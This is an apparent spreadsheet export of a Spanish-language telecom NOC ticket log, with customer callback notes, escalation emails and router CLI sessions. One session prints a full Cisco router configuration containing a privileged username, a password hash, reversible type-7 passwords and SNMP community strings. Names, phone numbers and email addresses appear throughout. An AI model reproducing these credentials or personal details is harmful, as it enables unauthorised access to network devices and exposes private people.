IMPORTANCIA: ALTA
BUENOS DÍAS,
POR FAVOR SU APOYO CON ACTUALIZACIÓN DEL INCIDENTE SD1132753. TUNNEL 115 CONTINUA DOWN.
RT-ABVO-GTM-CAMO-INFO-AR01&gt;
RT-ABVO-GTM-CAMO-INFO-AR01&gt;SH INTE TU115
TUNNEL115 IS UP, LINE PROTOCOL IS DOWN
  HARDWARE IS TUNNEL
  DESCRIPTION: TUNNELGREE_ENLACEINTERNETCLARO_CAMOJA
  INTERNET ADDRESS IS 10.16.222.58/30
RT-ABVO-GTM-CAMO-INFO-AR01&gt;SH CLO
04:18:12.736 GTT TUE JUN 7 2022
RT-ABVO-GTM-CAMO-INFO-AR01&gt;
MUCHAS GRACIAS
ESTEBAN CESPEDES S.
NETWORK OPERATIONS CENTER | LATAM NETOPS
T +1 866 818 2106 OPT 3 (4440-1942 MX) OFFICE
T + +506 4109 3087
ULTRAPARK II
HEREDIA, COSTA RICA</t>
  </si>
  <si>
    <t>F4592617</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR EMILIO AGUILAR QUIEN SOLICITA QUE SE LE ENVIE LAS EVIDENCIAS POR CORREO || SE NOTIFICA A GESTOR **
ID 1001729061
**</t>
  </si>
  <si>
    <t>SE ACTUALIZA A TELMEX
NEW TICKET REQUEST ::: ID LOCAL IP21680141 ::: TICKET CNOC IMBBL004144 ::: FUERA DE SERVICIO
AXEL SAMUEL LOPEZ ORTIZ
BUENOS DÍAS ESTIMADOS.
PERSONAL TÉCNICO VALIDO QUE SE TIENE CORTE DE FO, POR TAL MOTIVO ESTÁ AFECTADO EL SERVICIO, YA SE ESTÁ COORDINANDO PERSONAL DE PLEX, TOMAR EN CUENTA QUE EL PERSONAL VALIDARA LA ÚLTIMA MILLA DE SER NECESARIO EL INGRESO AL SITIO SE ESTARÁ COMPARTIENDO LA INFORMACIÓN DEL PERSONAL QUE INGRESARA POR ESTE MEDIO.
ATENTAMENTE:</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78618880 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001703275</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 78618880 CONTESTA LA SEÑOR JAMILET JURADO QUIEN INDICA QUE YA ESTA RESTABLECIDO EL SERVICIO QUE YA HABIA ENVIADO CORREO INDICANDO QUE ESTA SOLUCIONADO || SE NOTIFICA A GESGTOR **
-ID 1001727676
**</t>
  </si>
  <si>
    <t>***---  TELMEX CONFIRA RECEPCIÓN DE DATOS Y SOLICITA QUE LOS TÉCNICOS LLEVEN CARTILLA DE VACUNACIÓN ---**  SE NOTIFICA A CNOC VÍA SKYPE
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: MIÉRCOLES, 8 DE JUNIO DE 2022 00:45
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; AGUILAR MENDOZA EMILIO &lt;EAMENDOZ@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: NEW TICKET REQUEST ::: ID LOCAL IP21680141 ::: TICKET CNOC IMBBL004144 ::: FUERA DE SERVICIO
BUEN DIA TEAM
GRACIAS POR LA INFORMACIÓN, LA COMPARTIREMOS A CLIENTE, FAVOR DE TAMBIÉN LLEVAR LA CARTILLA DE VACUNACIÓN YA QUE CLIENTE LA ESTÁ SOLICITANDO PARA FACILITAR EL ACCESO.
QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 78618880 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 10011736194
**</t>
  </si>
  <si>
    <t>F4592696</t>
  </si>
  <si>
    <t>AÚN NO SE CUENTA CON CORREO RESPUESTA DE CLIENTE; SE LE PIDE DE NUEVO APOYO POR LA MISMA VÍA.
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158</t>
  </si>
  <si>
    <t>F4592711</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR DIEGO MORA INDICA QUE AUN VE EL ENLACE CAIDO || SE NOTIFICA  A GESTOR **
ID 1001710069
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 NO CONTESTA OPERADORA INDICA QUE TODOS LOS AGENTES ESTAN OCUPADOS || SE INTENTARA LUEGO **
ID 1001687319
**</t>
  </si>
  <si>
    <t>F4592714</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO CAMPOSECO AL 24215200 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO TUVO QUE REINICIAR EL EQUIPO Y QUIERE SABER EL MOTIVO Y SI TUVO ALGUN LOG || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001713276
**</t>
  </si>
  <si>
    <t>F4592737</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROMULO AYALA AL 2374-2235 CLIENTE INFORMA QUE AUN SIGUE CON EL I
NCONVENIENTE SE NOTIFICA A GESTOR **
ID 1001718934
**</t>
  </si>
  <si>
    <t>F4592749</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE INFORMANDO QUE YA VALIDARON LOS EQUIPOS Y APLICARON REINICIO PERO ENLACE CONTINUA CAIDO.
SE LLAMA A CLIENTE SR. EDWIN PEREZ  72112657 SOLICITA QUE SE REALICE LA VISITA TECNICA MAÑANA MIERCOLES 08.06.2022, 09:00 AM. ENVIAR DATOS DE PERSONAL TECNICO A LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDWIN PEREZ 72112657 NO SE LOGRA COMUNICACION ID: 1001794740.</t>
  </si>
  <si>
    <t>SE DETIENEN ESCALACIONES SERVICIO ACTIVO CLEINTE VALIDA EN SITIO</t>
  </si>
  <si>
    <t xml:space="preserve">
PLEASE ENTER LOGIN INFORMATION FOR 10.179.30.100.
USERNAME: JAFERNANDEZ
+----------------------------------------------------------------+
| ESTE EQUIPO ES PROPIEDAD PRIVADA,                              |
| SI NO TIENE AUTORIZACION PARA INGRESAR AL EQUIPO, POR FAVOR    |
| CANCELE LA CONEXION INMEDIATAMENTE,CUALQUIER ANOMALIA SERA     |
| REPORTADA A LAS AUTORIDADES CORRESPONDIENTES.                  |
+----------------------------------------------------------------+
PASSWORD:
THE USER HAS BEEN LOCKED AND YOU CANNOT LOG ON IT.
PASSWORD AUTHENTICATION FAILED.
PLEASE VERIFY THAT THE USERNAME AND PASSWORD ARE CORRECT.
PASSWORD:
WARNING: NEGOTIATED KEY EXCHANGE ALGORITHM AND IDENTITY KEY FOR SERVER AUTHENTICATION ARE NOT SAFE. IT IS RECOMMENDED THAT YOU DISABLE THE INSECURE ALGORITHM OR UPGRADE THE CLIENT.
INFO: THE MAX NUMBER OF VTY USERS IS 15, THE NUMBER OF CURRENT VTY USERS ONLINE IS 2, AND TOTAL NUMBER OF TERMINAL USERS ONLINE IS 2.
      THE CURRENT LOGIN TIME IS 2022-06-08 09:22:00-06:00.
INFO: THE DEVICE IS NOT ENABLED WITH SECURE BOOT, PLEASE ENABLE IT.
&lt;NSRLSVZ6N1D1EID1&gt;TELNET VPN
&lt;NSRLSVZ6N1D1EID1&gt;TELNET VPN-INSTANCE APOYO 10.151.216.26
TRYING 10.151.216.26 ...
PRESS CTRL+K TO ABORT
INFO:PLEASE WAIT FOR A WHILE... CANCELLING USER REQUEST.
&lt;NSRLSVZ6N1D1EID1&gt;PING -VPN-INSTANCE APOYO 10.151.216.26
  PING 10.151.216.26: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.151.216.26 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;NSRLSVZ6N1D1EID1&gt;PING -VPN-INSTANCE APOYO 10.151.216.25
  PING 10.151.216.25: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.151.216.25 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;NSRLSVZ6N1D1EID1&gt;TICKET F4592771
                  ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;INGENIERIA GERENCIA
                  ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;SEMEH COMAYAGUA
                  ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;ESCALACIN
                  ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;4/4
&lt;NSRLSVZ6N1D1EID1&gt;4/4PASTOR RAMIREZ
&lt;NSRLSVZ6N1D1EID1&gt;4/4PASTOR RAMIREZ  33910016
&lt;NSRLSVZ6N1D1EID1&gt;4/4PASTOR RAMIREZ  339100166 HORAS
&lt;NSRLSVZ6N1D1EID1&gt;4/4PASTOR RAMIREZ  339100166 HORAS8:14:00
                  ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;
&lt;NSRLSVZ6N1D1EID1&gt;ESTADO ACTUAL PERSONAL TECNICO DE PLANTA EXTERNA CAMBIANDO EQUIPO DAADO.
                  ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;NSRLSVZ6N1D1EID1&gt;
&lt;NSRLSVZ6N1D1EID1&gt;TIEMPO TOTAL DE WORK  6 HORAS
&lt;NSRLSVZ6N1D1EID1&gt;PING -VPN
&lt;NSRLSVZ6N1D1EID1&gt;PING -VPN-INSTANCE AP
&lt;NSRLSVZ6N1D1EID1&gt;PING -VPN-INSTANCE APOYO 10.152.216.26
  PING 10.152.216.26: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.152.216.26: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.152.216.26: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.152.216.26: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.152.216.26: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
  --- 10.152.216.26 PING STATISTICS ---
    4 PACKET(S) TRANSMITTED
    4 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;NSRLSVZ6N1D1EID1&gt;TELNET VPN-INSTANCE APOYO 10.152.216.26
TRYING 10.152.216.26 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.152.216.26 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME:
% USERNAME:  TIMEOUT EXPIRED!
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;NSRLSVZ6N1D1EID1&gt;TELNET VPN-INSTANCE APOYO 10.152.216.26
TRYING 10.152.216.26 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.152.216.26 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME: CLARO
PASSWORD:
% AUTHENTICATION FAILED
USERNAME: T3LN0CR3D3S
PASSWORD:
IP2142021#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
FASTETHERNET0/0            10.152.216.26   YES NVRAM  UP                    UP
FASTETHERNET0/1            192.168.150.174 YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.2.9      YES NVRAM  UP                    UP
IP2142021#SHOW INTER DES
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
FA0/0                          UP             UP       WAN PRINCIPAL/_/IP2142021SV/_/
FA0/1                          UP             UP       LAN DEL CLIENTE
AT0/0/0                        ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
IP2142021#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.152.216.25           6   084F.0AC8.69AC  ARPA   FASTETHERNET0/0
INTERNET  10.152.216.26           -   0025.45C9.F7B0  ARPA   FASTETHERNET0/0
INTERNET  192.168.150.173         0   D476.A07B.F679  ARPA   FASTETHERNET0/1
INTERNET  192.168.150.174         -   0025.45C9.F7B1  ARPA   FASTETHERNET0/1
IP2142021#SHO IUNTE
IP2142021#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0          0     0    0 355802 421000   57 205000   54    0
* FASTETHERNET0/1          0     0    0     0 203000   54 381000   50    0
  ATM0/0/0                 0     0    0     0     0    0     0    0    0
* LOOPBACK5                0     0    0     0     0    0     0    0    0
IP2142021#SHO VER
CISCO IOS SOFTWARE, 2800 SOFTWARE (C2800NM-IPBASE-M), VERSION 12.4(15)T7, RELEASE SOFTWARE (FC3)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2008 BY CISCO SYSTEMS, INC.
COMPILED WED 13-AUG-08 17:09 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 12.4(13R)T, RELEASE SOFTWARE (FC1)
IP2142021 UPTIME IS 6 WEEKS, 1 DAY, 20 HOURS, 35 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C2800NM-IPBASE-MZ.124-15.T7.BIN"
CISCO 2811 (REVISION 53.51) WITH 251904K/10240K BYTES OF MEMORY.
PROCESSOR BOARD ID FTX1321A08X
2 FASTETHERNET INTERFACES
1 ATM INTERFACE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY ENABLED.
239K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
62720K BYTES OF ATA COMPACTFLASH (READ/WRITE)
CONFIGURATION REGISTER IS 0X2102
IP2142021#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4245 BYTES
!
VERSION 12.4
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME IP2142021
!
BOOT-START-MARKER
BOOT-END-MARKER
!
LOGGING BUFFERED 4096
NO LOGGING CONSOLE
ENABLE SECRET 5 $1$N4HB$RXNA/OQMUNZZIHYZEBBYN.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AAA SESSION-ID COMMON
CLOCK TIMEZONE GMT -6
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
!
!
IP CEF
!
!
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
IP NAME-SERVER 201.247.155.225
IP NAME-SERVER 201.247.157.225
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 051F55032F1C4D5B49554F
ARCHIVE
 LOG CONFIG
  HIDEKEYS
!
!
IP TCP SYNWAIT-TIME 10
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.2.9 255.255.255.255
!
INTERFACE FASTETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2142021SV/_/
 BANDWIDTH 5120
 IP ADDRESS 10.152.216.26 255.255.255.248
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.150.174 255.255.255.252
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE ATM0/0/0
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
 DSL OPERATING-MODE AUTO
!
ROUTER BGP 64530
 NO SYNCHRONIZATION
 BGP LOG-NEIGHBOR-CHANGES
 NETWORK 192.5.31.0
 REDISTRIBUTE CONNECTED
 REDISTRIBUTE STATIC
 NEIGHBOR 10.152.216.25 REMOTE-AS 22833
 NEIGHBOR 10.152.216.25 TIMERS 30 90
 NEIGHBOR 10.152.216.25 ROUTE-MAP PRINCIPAL_IN IN
 NEIGHBOR 10.152.216.25 ROUTE-MAP PRINCIPAL_OUT OUT
 NO AUTO-SUMMARY
!
IP FORWARD-PROTOCOL ND
IP ROUTE 192.5.31.0 255.255.255.0 192.168.150.173 NAME FIREWALL
!
IP AS-PATH ACCESS-LIST 1 PERMIT ^$
!
NO IP HTTP SERVER
!
!
IP PREFIX-LIST DEFAULT SEQ 5 PERMIT 0.0.0.0/0
LOGGING SOURCE-INTERFA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SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY SAC RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
NO CDP RUN
ROUTE-MAP PRINCIPAL_IN PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST DEFAULT
 SET WEIGHT 250
!
ROUTE-MAP BACKUP_OUT PERMIT 10
 MATCH AS-PATH 1
 SET METRIC 100
!
ROUTE-MAP PRINCIPAL_OUT PERMIT 10
 MATCH AS-PATH 1
 SET METRIC 50
!
ROUTE-MAP BACKUP_IN PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST DEFAULT
 SET WEIGHT 200
!
!
!
CONTROL-PLANE
!
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
LINE AUX 0
LINE VTY 0 4
 PASSWORD 7 05080F1C2243
!
SCHEDULER ALLOCATE 20000 1000
NTP CLOCK-PERIOD 17180399
NTP SERVER 201.247.152.249
NTP SERVER 201.247.152.233 PREFER
!
END
IP2142021#</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN PEREZ AL 72112657 INFORMA QUE YA ESTAN LOS ACCESOS DISPONIBLE QUE SE PUEDE PRESENTAR EL PERSONAL TECNICO**
-ID 1001913410
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDWIN PEREZ 72112657 PERO NO SE LOGRA COMUNICACION, SE ENVIA CORREO
ASUNTO: INCIDENTE SD1132808 || IP2142021 || SOCIEDAD DE AHORRO Y CREDITO APOYO INTEGRAL S.A</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDWIN PEREZ 72112657 NO CONTESTA IVR ENVIA A BUZON, ID: 1001793328.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO SOLICITANDO ACCESOS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 17:50
PARA: RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; EDWIN ALEJANDRO PEREZ SIGUACHI &lt;EDWIN.PEREZ@INTEGRAL.COM.SV&gt;
CC: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: F4592749 || IP2142021 || SOCIEDAD DE AHORRO Y CREDITO APOYO INTEGRAL S.A
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS  PARA EL DIA DE MAÑANA SEGUN HORARIO PROPORCIONADO 9:00HRS
DIRECCION: SANTA ROSA DE LIMA /LA UNIONBO. EL CONVENTO2A. AVENIDA SUR540
03236741-2 10807 JOSE LUIS RODRIGUEZ</t>
  </si>
  <si>
    <t>F4592751</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MARIBEL HERNANDEZ 76260469  PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
1001700912
1001701270
1001701393</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIBEL HERNANDEZ 76260469 - 76826825 SE TENIA EN LINEA A CLIENTE PERO SE QUEDO CONGELADA LA LLAMADA, SE INTENTA VOLVER A LLAMAR PERO NO SE TIENE RESPUESTA
-ID 1001820134 - 1001820651 - 1001821452 - 1001821631</t>
  </si>
  <si>
    <t>F4592752</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE IRIS FLORES 78552787 RESPONDE CARLOS MENCIONA QUE NO CUENTA CON NINGUNA IP UNICAMENTE SE CONECTA A UN FIREWALL PERO LA INTERFAZ WAN LA OBSERVA CAIDA
MONITOREOIT@PREMIUM.SV
-ID 1001722711</t>
  </si>
  <si>
    <t>F4592753</t>
  </si>
  <si>
    <t>CLIENTE STANLEY CANDRAY 70700120 INDICA QUE TODAS SUS EXTENCIONES ESTAN FUNCIONANDO MENOS 22137796  ESTO YA QUE SALE COMO NUMERO DESCONOCIDO AL MARCAR, TODAS LAS DEMAS MUESTRAN EL NUMERO CORRECTO. SE LE INDICA QUE ESTO ES PROBLEMA DE LA PBX YA QUE CLARO CONFIGURO AYER TODO EL RANGO PERMITIDO. SE PROCEDE AL CIERRE. PROBLEMA DE CONFIGURACIÓN EN LA PBX
1001692880
COLA:
NOMBRE: A: 0050370700120
NÚMERO: 0050370700120
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050370700120
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 08:28:17</t>
  </si>
  <si>
    <t>F4592755</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEISEL MENDOZA-47930731
1001699598
COLA:
NOMBRE: A: 47930731
NÚMERO: 47930731
DURACIÓN: 0:00:19
ESTADO: MARCANDO
DETALLES: 47930731
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 08:51:21</t>
  </si>
  <si>
    <t>F4592765</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 79300569 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001846921</t>
  </si>
  <si>
    <t>SE VALIDA EQUIPO FORTINET CONECTADO AL CPE
ID1136015#SHOW IP ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.140.70.85            -   6412.25E3.18D2  ARPA   FASTETHERNET4
INTERNET  10.140.70.86           14   8CFD.18AA.65CB  ARPA   FASTETHERNET4
INTERNET  190.86.205.53         102   906C.ACBA.DA82  ARPA   VLAN1
INTERNET  190.86.205.54           -   6412.25E3.18CE  ARPA   VLAN1
ID1136015#SHOW INT DES
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
FA0                            UP             DOWN
FA1                            UP             DOWN
FA2                            UP             UP
FA3                            UP             DOWN
FA4                            UP             UP       WAN PRINCIPAL/_/ID1136015SV/_/
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
ID1136015#SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
FASTETHERNET0              UNASSIGNED      YES UNSET  UP                    DOWN
FASTETHERNET1              UNASSIGNED      YES UNSET  UP                    DOWN
FASTETHERNET2              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET3              UNASSIGNED      YES UNSET  UP                    DOWN
FASTETHERNET4              10.140.70.85    YES NVRAM  UP                    UP
LOOPBACK5                  10.166.16.133   YES NVRAM  UP                    UP
VLAN1                      190.86.205.54   YES NVRAM  UP</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE KARLA, INDICA QUE ESTARAN LLEGANDO TECNICOS DE IT A REVISAR EL FORTINET Y SOLICITA QUE SE LE LLAME A LAS 15:30 HORAS PARA VALIDAR CIERRE DE CASO.
NÚMERO: 0050379300569
FIN: HOY, 08:54
ID DE LLAMADA: 1001697250</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA
1001697250
COLA:
NOMBRE: A: 0050379300569
NÚMERO: 0050379300569
DURACIÓN: 0:02:36
ESTADO: CONECTADA
DETALLES: 0050379300569
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 7/06/2022 08:46:08</t>
  </si>
  <si>
    <t>F4592767</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIRZA PEÑA AL 59999468 / 79525722 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001773184 - 1001773321
**</t>
  </si>
  <si>
    <t>###SE LLAMA A CLIENTE MIRZA PEÑA INDICA QUE EL ENLACE OPERATIVO Y SE PUEDE DAR CIERRE AL TICKET###
1001774173
COLA:
NOMBRE: A: 59999468
NÚMERO: 59999468
DURACIÓN: 0:00:53
ESTADO: CONECTADA
DETALLES: 59999468
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 7/06/2022 12:18:24</t>
  </si>
  <si>
    <t>F4592770</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS 98090168 MENCIONA QUE NO TIENE SALIDA A INTERNET, SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CORTA LA LLAMADA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001711416</t>
  </si>
  <si>
    <t>F4592771</t>
  </si>
  <si>
    <t>CCR HONDURAS				
	WO OPEN                                			2:14:00 A. M.
1/4	LUIS SANDRES           	89904245	2.5 HORAS	4:44:00
2/4	FRANKLIN BUESO  	89904208	3 HORAS	5:14:00
3/4	MANUEL LARIOS   	31921638	5 HORAS	7:14:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	8:14:00</t>
  </si>
  <si>
    <t>SIN RESPUESTA DE TECNICO MANDA A BUZON</t>
  </si>
  <si>
    <t>2001020151
COLA:
NOMBRE: A: 50431703100
NÚMERO: 50431703100
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50431703100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 8/06/2022 13:25:26</t>
  </si>
  <si>
    <t>NO SE OBTIENE RESPUESTA DE TECNICOS SE ENCUENTRAN EN TRASLADO</t>
  </si>
  <si>
    <t>TECNICOS EN TRASLADO A NODO PARA ACTUALIZACION DE EQUIPO</t>
  </si>
  <si>
    <t>F4592774</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL RODRIGUEZ 70527029 NO RESPONDE, SE INTENTAR LUEGO
-ID 1001716144</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL RODRIGUEZ 70527029 CLIENTE INDICA QUE AUN SIGUE PRESENTANDO LENTITUD EN EL SERVICIO || SE NOTIFICA A GESTOR **
-ID 1001781797
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL RODRIGUEZ 70527029 NO RESPONDE, ENVIA A BUZON ||
SE INTENTAR LUEGO**
-ID 1001762960
**</t>
  </si>
  <si>
